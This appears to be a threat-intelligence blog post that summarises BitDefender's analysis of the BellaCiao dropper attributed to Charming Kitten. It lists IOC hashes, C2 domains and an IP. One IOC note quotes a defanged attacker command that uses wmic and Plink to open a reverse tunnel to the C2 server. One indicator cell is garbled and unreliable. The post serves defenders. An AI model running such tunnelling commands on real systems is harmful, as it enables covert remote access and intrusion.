Charming Kitten APT Targeting Multiple Global Regions with BellaCiao Custom Dropper Malware Campaign

On April 26, 2023, BitDefender Labs researchers reported the technical details of a new custom malware named BellaCiao they attribute to the Iranian Charming Kitten advanced persistent threat (APT).

Context

According to the report, “This malware is tailored to suit individual targets and exhibits a higher level of complexity, evidenced by a unique communication approach with its command-and-control (C2) infrastructure.” BitDefender reported that samples of BellaCiao they analyzed targeted organizations in the United States, Europe, the Middle East (Turkey), and Asia (India).

Technical Details

According to the report,

  • “The BellaCiao is a dropper malware – it is designed to deliver other malware payloads onto a victim’s computer system, based on instructions from C2 server. The payload delivered by BellaCiao is not downloaded but hardcoded into the executable as malformed base64 strings and dumped when requested.”
  • Each sample analyzed was tailored to a specific target with hardcoded data such as company name, specific subdomains, and public IP addresses.
  • All samples included PDB paths and included folders organizing targets by country.
  • The initial infection vector is unknown, but BitDefender researchers assess that a Microsoft Exchange exploit chain or similar vulnerability was leveraged, since the primary target of the campaign was Microsoft Exchange servers.
  • The malware establishes persistence by creating a new service instance disguised by including legitimate Exchange process names.

IOCs

BitDefender researchers shared the following indicators of compromise (IOCs):

Indicator

Type

Notes

4812449f7fad6
2162ba8c4179d5d45d7

MD5

Plink tool is used for establishing reverse proxy connections to the C2 server. The address is provided by the parent PowerShell script.

3fbea74b92f418
09f46145f480782ef9

MD5

The Plink tool used for the same purpose but executed using the wmic[.]exe tool -> 

wmic /node:127[.]0[.]0[.]1 process call create “c:\\windows\\temp\\Certificates\\envisa[.]exe 88[.]80[.]148[[.]]162 -P 443 -C -R 127[.]0[.]0[.]1:40455:192[.]168[.]10[.]10:1433 -l <user> -pw <password>”

c450477ed9c347
c4c3d7474e1f069f14

MD5

The PowerShell script implements the HTTP server for executing commands[.] It executes the C:\ProgramData\Microsoft\DRMS\JavaUpdateServices[.]exe for communicating with mail-updateservice[[.]]info[.]

c6f394847eb3dc2
587dc0c0130249337

MD5

The PowerShell script implements the HTTP server for executing commands[.] It executes the C:\ProgramData\Microsoft\DRMS\JavaUpdateServices[.]exe for communicating with mail-updateservice[[.]]info[.]

7df50cb7d46206
21c2246535dd3ef10c

MD5

The PowerShell script implements the HTTP server for executing commands[.] It executes the C:\ProgramData\Microsoft\DRMS\JavaUpdateServices[.]exe for communicating with mail-updateservice[[.]]info[.]

e7149c402a377
19168fb739c62f25585

MD5

The PowerShell script implements the HTTP server for executing commands[.] It executes the C:\ProgramData\Microsoft\DRMS\JavaUpdateServices[.]exe for communicating with mail-updateservice[[.]]info[.]

284cdf5d2b293
69f0b35f3ceb363a3d1

MD5

The PowerShell script implements the HTTP server for executing commands[.] It executes the C:\ProgramData\Microsoft\Diagnostic\MicrosoftExchangeServicesLog[.]exe for communicating with mailupdate[[.]]com and msn-service[[.]]co[.]

2daa29f965f6614
05e13b2a10d859b87

MD5

The Powershell script implements the HTTP server for executing commands[.] It executes the C:\ProgramData\Microsoft\Diagnostic\MicrosoftExchangeDiagnosticServices[.]exe for communicating with maill-support[[.]]com and msn-center[[.]]uk[.]

f56a6da833289f
821dd63f902a360c31

MD5

88[.]80[.]+C2:C10148[.]162

mail-updateservice[.]info

Domain

 

msn-center[.].uk

Domain

 

msn-service[.]co

Domain

 

twittsupport[.]com

Domain

 

mailupdate[.]info

Domain

 

maill-support[.]com

Domain

 

88[.]80[.]148[.]162

IP Address

 

 

More Recent Blog Posts